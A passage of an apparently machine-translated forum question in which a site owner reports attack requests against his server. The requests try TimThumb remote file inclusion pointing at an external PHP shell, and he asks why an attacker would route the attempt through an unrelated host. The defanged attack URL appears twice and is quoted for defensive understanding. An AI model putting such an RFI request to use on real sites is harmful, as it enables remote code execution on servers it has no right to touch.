私のサーバ(mediaquarter.at)は、このようなリクエスト(現在はいくつかの小さなバリエーションがあります)によって現在DDoSされています:hXXp://www.mediaquarter.at/http://www.madeineurope.org.uk/media/functions/ timthumb/timthumb.php?src = http://blogger.com.midislandrental.com/.mods/sh.php(誰も誤ってクリックすることがないようにURL「非アクティブ化」)別のサーバー経由でのリモートファイルのインクルード
参照されるPHPファイル:preg_replaceには/ eスイッチが有効になっていて、コードには複数のeval文が含まれています。 http://www.offensivecomputing.net/?q=node/1417
TimThumbはリモートファイルのインクルードに脆弱です(http://eromang.zataz.com/2011/09/20/wordpress-timthumb-rfi-vulnerability- botnet-recruitment-vector /)として使用されています - WordPressでかなり普及しているようです。だから、私はhXXP://www.madeineurope.org.uk/media/functions/timthumb/timthumb.php?src = http://blogger.com.midislandrental.com/.mods/sh.phpを呼び出す人を理解するだろう脆弱性。
しかし、別のウェブサイト(mediaquarter.at)で呼び出すと、404エラーメッセージだけが表示されます。さらに、私のサーバーはWordPressを実行していませんが、代わりにSilverStripeを使用しているので、これはかなり無意味です。
これは攻撃側のエラー/愚かなのでしょうか、ここで何らかの攻撃方法が見落とされていますか?
PS:サーバーはちょうど安価なWebホスティングで、私はまったく手元に届かないので、システムに変更があるかどうか確認できません。
serverfaultはこの質問をするのに適していませんか? – Lukman
私は主に、脆弱性の影響を受けていない別のホスト経由でRFIを呼び出す理由に興味があります。だから私は、これはむしろsysの管理者よりもプログラミングの部分に収まると思った... – xeraa
うわあ、あなたはあなた自身の質問全体に答えました。なぜ投稿しましたか? – rook